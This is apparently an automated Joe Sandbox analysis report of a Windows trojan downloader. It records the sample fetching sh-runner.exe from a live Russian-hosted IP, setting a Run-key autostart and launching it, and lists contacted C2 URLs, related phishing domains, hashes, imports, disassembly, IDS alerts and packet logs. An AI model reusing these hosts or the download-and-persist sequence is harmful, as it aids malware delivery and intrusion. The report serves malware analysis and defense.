https://84.201.150.223:443/P	sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/X	sh-runner.exe, 00000009.00000002.3055837963.00000184C00F0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/Y	sh-runner.exe, 00000009.00000002.3055151540.00000184BE357000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/=	sh-runner.exe, 00000004.00000002.3055154442.00000112CF558000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223:443/X	sh-runner.exe, 00000002.00000002.3055231601.000001FF23026000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmp, sh-runner.exe, 00000004.00000003.2301836654.00000112CF60C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/7V	sh-runner.exe, 00000004.00000002.3055154442.00000112CF608000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://84.201.150.223/sh-runner.exeT	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E2F000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://84.201.150.223/K	sh-runner.exe, 00000004.00000002.3055154442.00000112CF5D5000.00000004.00000020.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
84.201.150.223	unknown	Russian Federation		200350	YANDEXCLOUDRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521496
Start date and time:	2024-09-28 17:51:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@9/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 128
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 41.63.96.128
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe

Simulations

Behavior and APIs

Time	Type	Description
16:52:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyProgram C:\ProgramData\sh-runner.exe
16:52:24	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyProgram C:\ProgramData\sh-runner.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.201.150.223	SecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exe	Get hash	malicious	Metasploit	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
windowsupdatebg.s.llnwi.net	http://telesexprivatexx.vercel.app/	Get hash	malicious	Porn Scam	Browse	41.63.96.0
	http://atttew.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	46.228.146.128
	https://meettamask-logiinii.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	87.248.205.0
	https://att-104249.weeblysite.com/	Get hash	malicious	Unknown	Browse	87.248.204.0
	http://aaqoalwsmendufy.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	87.248.202.1
	http://layanan-customer-danaid.dankz.my.id/	Get hash	malicious	Unknown	Browse	87.248.204.0
	https://bhy.srl.mybluehost.me/SBB/index/	Get hash	malicious	Unknown	Browse	87.248.205.0
	http://pttroqtr.top/help	Get hash	malicious	Unknown	Browse	87.248.205.0
	https://uphold-login-un.godaddysites.com/	Get hash	malicious	Unknown	Browse	178.79.238.128
	http://ikwmasoledrbwys.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	87.248.205.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
YANDEXCLOUDRU	SecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exe	Get hash	malicious	Metasploit	Browse	84.201.150.223
	http://xn--r1a.website/s/ogorodru	Get hash	malicious	Unknown	Browse	130.193.42.23
	http://vidaliaonion.org	Get hash	malicious	Unknown	Browse	130.193.53.230
	Vt5wr1Hj3H.elf	Get hash	malicious	Mirai	Browse	178.154.229.200
	https://faq-kak.ru/kak-najti-svoyu-biblioteku-v-steam/	Get hash	malicious	Unknown	Browse	130.193.58.13
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	84.201.130.205
	http://paypal.6887xyyz.biz.id/	Get hash	malicious	Unknown	Browse	130.193.53.144
	file.exe	Get hash	malicious	Raccoon Stealer v2, RedLine, SmokeLoader	Browse	130.193.51.105
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	130.193.51.105
	file.exe	Get hash	malicious	DarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoader	Browse	130.193.51.105

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
72a589da586844d7f0818ce684948eea	SecuriteInfo.com.Win64.Evo-gen.19321.5552.exe	Get hash	malicious	Unknown	Browse	84.201.150.223
	SecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exe	Get hash	malicious	Metasploit	Browse	84.201.150.223
	file.exe	Get hash	malicious	SmokeLoader	Browse	84.201.150.223
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse	84.201.150.223
	file.exe	Get hash	malicious	SmokeLoader	Browse	84.201.150.223
	YPDi0gRMHU.exe	Get hash	malicious	SmokeLoader	Browse	84.201.150.223
	CNpQfI8eIT.exe	Get hash	malicious	SmokeLoader	Browse	84.201.150.223
	6NlY2E3Wqi.exe	Get hash	malicious	SmokeLoader	Browse	84.201.150.223
	4EtLXn5pqI.exe	Get hash	malicious	SmokeLoader	Browse	84.201.150.223
	RWcyVDbMGQ.exe	Get hash	malicious	SmokeLoader	Browse	84.201.150.223

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1169665
Entropy (8bit):	6.512528295738881
Encrypted:	false
SSDEEP:	24576:xm360uIhQFmq6XxxlFLRsY2TunLczsEsffWOpc8Ip/Q4k73zs/41kesms:xmK0ThQFmFLRD2TuAHsXW/8Ipo3zs/4m
MD5:	D178CD15E8E69662A943BF0A9DA7FF60
SHA1:	13475DFB0075D3ADC31AC02B8DC10DEC3C3E84E9
SHA-256:	482A86391842A2B869FFD38AF0DBFA96DE7501A92986E644B54D8AE731BDAF64
SHA-512:	65A7F7FC0613F8C773D3B8627D53ABB51E708F666986938B28BC4A8689FA63B32B9565B8B00973D8EB82416F1DB486AF8948FD88771C51C341C95E5AC6F4F841
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.6........&....+.....2.................@..........................................`... ..............................................P............... ..Xb..............................................(...................xV...............................text...............................`..`.data...............................@....rdata...E.......F..................@..@.pdata..Xb... ...d..................@..@.xdata..\............\..............@..@.bss.........@...........................idata.......P......................@....CRT....h....p.......$..............@....tls.................&..............@....reloc...............(..............@..B................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\ProgramData\sh-runner.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\ProgramData\sh-runner.exe
File Type:	data
Category:	modified
Size (bytes):	290
Entropy (8bit):	2.953254816618974
Encrypted:	false
SSDEEP:	6:kK+KPL9Usw9L+N+SkQlPlEGYRMY9z+4KlDA3RUe/:tPiD9LNkPlE99SNxAhUe/
MD5:	373BCF3B8F5B395880F73468DA88E65E
SHA1:	86731946C021251D66731954C0DC7A67393F3F2C
SHA-256:	6B15EE068E7878D755280DEAC743642012D3310EC444A52586BD9758909FE608
SHA-512:	431930393FF7FC1E6CAC154E9E1930D2096049FB0365F1022653C69ED6F3DA4F5E3EE1FA3FFE450E72B06E068A71696391EC48F1F3780DD64633B34ADD47DFBC
Malicious:	false
Preview:	p...... ......../$.d....(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sh-runner[1].exe

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	1169665
Entropy (8bit):	6.512528295738881
Encrypted:	false
SSDEEP:	24576:xm360uIhQFmq6XxxlFLRsY2TunLczsEsffWOpc8Ip/Q4k73zs/41kesms:xmK0ThQFmFLRD2TuAHsXW/8Ipo3zs/4m
MD5:	D178CD15E8E69662A943BF0A9DA7FF60
SHA1:	13475DFB0075D3ADC31AC02B8DC10DEC3C3E84E9
SHA-256:	482A86391842A2B869FFD38AF0DBFA96DE7501A92986E644B54D8AE731BDAF64
SHA-512:	65A7F7FC0613F8C773D3B8627D53ABB51E708F666986938B28BC4A8689FA63B32B9565B8B00973D8EB82416F1DB486AF8948FD88771C51C341C95E5AC6F4F841
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.6........&....+.....2.................@..........................................`... ..............................................P............... ..Xb..............................................(...................xV...............................text...............................`..`.data...............................@....rdata...E.......F..................@..@.pdata..Xb... ...d..................@..@.xdata..\............\..............@..@.bss.........@...........................idata.......P......................@....CRT....h....p.......$..............@....tls.................&..............@....reloc...............(..............@..B................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	222
Entropy (8bit):	4.917948116227102
Encrypted:	false
SSDEEP:	6:DQ8azNz+Ev9UVVrhWNQuGazNUIepcFiizNv:DMz4VrIiezGIxFiiz9
MD5:	F2EFC9C3111CCF2907BD961B10D4CCB0
SHA1:	57313B0E33B46AFE9BA15DE2AC7141501D2CA790
SHA-256:	E2B2C1B9F7D7C2B2E8B7C8BF64FEE65235C9BC32341F475AC80FCF372940E0E6
SHA-512:	054DB1081BE03AD4E1F29F8CEE1243C1D9A77ECDA38C2823E2623A7AE53E1D996878506924A47A3D0A0D5A493A4541A9C18677F1AA3684A0D67CD595EE83AD6D
Malicious:	false
Preview:	Saving file to: C:\ProgramData\sh-runner.exe..Starting download from: http://84.201.150.223/sh-runner.exe..File downloaded to: C:\ProgramData\sh-runner.exe..Added to startup...Launching file: C:\ProgramData\sh-runner.exe..

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	5.80327639091689
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
File size:	250'094 bytes
MD5:	ccf3c480f27db238fa757d0967241817
SHA1:	8067f4e9093dd68fc54a2270c3e4aa6e2e442929
SHA256:	ab963f165c5269b14b0275a2b25f2e1110a7e3ca903324e106701a4167026270
SHA512:	31c468af4e4d1059fb3612ad6e40be09b98124b548b343d2fce794400cdcc423f25b38ce588732d7d85e995f27f676154f6ea5dbfeba684a6853f0cf1ecfcd80
SSDEEP:	3072:SX7Hcsrt6MZso134/OdfYIak6wJjTpY418PWZ8m1X4VQai0auFtE4IhRZgI+mB1V:4Hxpsc4ejak6wZQ3pWB1rp
TLSH:	90346BC5BBC5ACEBC6054636889F43693738F6D117839B271D3872351E27AD0BE8B246
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.$........&....+.r.....................@.....................................C....`... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x1400013f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66F28CC4 [Tue Sep 24 09:56:20 2024 UTC]
TLS Callbacks:	0x400019e0, 0x1, 0x400019b0, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2e8e33a2fc5c0b8dca8ebc8bd69833ed

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00009545h]
mov dword ptr [eax], 00000000h
call 00007F6BE0B3515Fh
nop
nop
dec eax
add esp, 28h
ret
nop dword ptr [eax]
dec eax
sub esp, 28h
call 00007F6BE0B3BF0Ch
dec eax
cmp eax, 01h
sbb eax, eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000009h]
jmp 00007F6BE0B353B9h
nop dword ptr [eax+00h]
ret
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov eax, 00001060h
call 00007F6BE0B368DAh
dec eax
sub esp, eax
dec eax
lea ebp, dword ptr [esp+00000080h]
dec eax
mov dword ptr [ebp+00000FF0h], ecx
dec eax
mov dword ptr [ebp+00000FF8h], edx
dec eax
mov eax, dword ptr [ebp+00000FF0h]
dec eax
mov edx, eax
dec eax
lea eax, dword ptr [00008B7Bh]
dec eax
mov ecx, eax
call 00007F6BE0B3BFE8h
mov dword ptr [esp+20h], 00000000h
inc ecx
mov ecx, 00000000h
inc ecx
mov eax, 00000000h
mov edx, 00000001h
dec eax
lea eax, dword ptr [00008B6Fh]
dec eax
mov ecx, eax
dec eax
mov eax, dword ptr [0000CF91h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe000	0x8f0	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xb000	0x474	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11000	0x84	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa200	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe270	0x1f8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7128	0x7200	d98c809291cb2d8479f4665a1e010733	False	0.5814830043859649	data	6.252730100417784	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x9000	0xc0	0x200	b59a3d526c198fbd9c18d77c1719044c	False	0.146484375	data	0.8974525018731327	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa000	0xf60	0x1000	bebd663d09a99bc640fe8016275af4dd	False	0.313720703125	data	4.6982313747152125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata	0xb000	0x474	0x600	7bc7d857dfcb4b84fb5ff645b59e8b42	False	0.4127604166666667	data	3.35870342166892	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0xc000	0x438	0x600	a2bc8b52ffacce06414e4549df6454b2	False	0.2740885416666667	data	3.5066608679489093	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0xd000	0xb80	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xe000	0x8f0	0xa00	1f9b7bf9a6229d156fd1700931e1f773	False	0.335546875	data	3.7139386224408053	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0xf000	0x60	0x200	fb96f62ea2a8e27523f57d4e54a3b3f2	False	0.068359375	data	0.28655982431271465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x10000	0x10	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x11000	0x84	0x200	91642fa450a154600c9d45be3f45a381	False	0.251953125	data	1.5082210387070034	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/4	0x12000	0x620	0x800	e70b47b266b9de6df73db7aa96f68411	False	0.181640625	data	1.463451915129665	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0x13000	0x1207c	0x12200	307e054b2dfb16605ce7f3060e7370ac	False	0.423828125	data	5.788144327604367	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/31	0x26000	0x321c	0x3400	335de062d2872a1053913069789fc304	False	0.24466646634615385	data	4.77587302511516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/45	0x2a000	0x6d6d	0x6e00	3fe4dd2735c2cfdea1bc4b20463272e7	False	0.5142755681818182	data	5.051792905393766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/57	0x31000	0x16c0	0x1800	b724d274feec9d30bbd06520a62b6d0b	False	0.2882486979166667	data	4.425321557333535	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/70	0x33000	0x39d	0x400	7525f1145b47b06d73d7667bb1386b5f	False	0.435546875	data	4.6233906248986	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/81	0x34000	0x15fa	0x1600	b15394a328eca738bc353b3ca53f2a1e	False	0.16352982954545456	data	4.685680000488948	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/97	0x36000	0x7825	0x7a00	55d8fd851ce8c104fa85ae82a803b030	False	0.5157210553278688	data	5.811022996425546	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/113	0x3e000	0x52b	0x600	c8f735d4379e14fc5ae61b34491dffc7	False	0.63671875	data	5.310144103808594	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegOpenKeyA, RegSetValueExA
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte
msvcrt.dll	__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _lock, _onexit, _unlock, abort, calloc, exit, fclose, fopen, fprintf, fputc, free, fwrite, localeconv, malloc, memcpy, memset, signal, strerror, strlen, strncmp, vfprintf, wcslen
SHELL32.dll	SHGetFolderPathA, ShellExecuteA
WININET.dll	InternetCloseHandle, InternetOpenA, InternetOpenUrlA, InternetReadFile

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-28T17:52:15.584063+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49731	84.201.150.223	8443	TCP
2024-09-28T17:52:26.916639+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49734	84.201.150.223	8443	TCP
2024-09-28T17:52:34.436379+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49742	84.201.150.223	8443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2024 17:52:12.399903059 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:12.405083895 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:12.405158043 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:12.405299902 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:12.410661936 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.120754957 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.120820045 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.120980024 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121052980 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.121207952 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121223927 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121243000 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121251106 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.121267080 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121268034 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.121283054 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121285915 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.121299982 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121304035 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.121325016 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.121325016 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121335983 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.121342897 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.121362925 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.121381998 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.134938955 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.134955883 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.134998083 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.135040045 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.135364056 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.135416031 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.254710913 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.254729033 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.254736900 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.254843950 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.255331039 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.255356073 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.255372047 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.255395889 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.255409002 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.255414009 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.255423069 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.255450010 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.256238937 CEST	80	49730	84.201.150.223	192.168.2.4
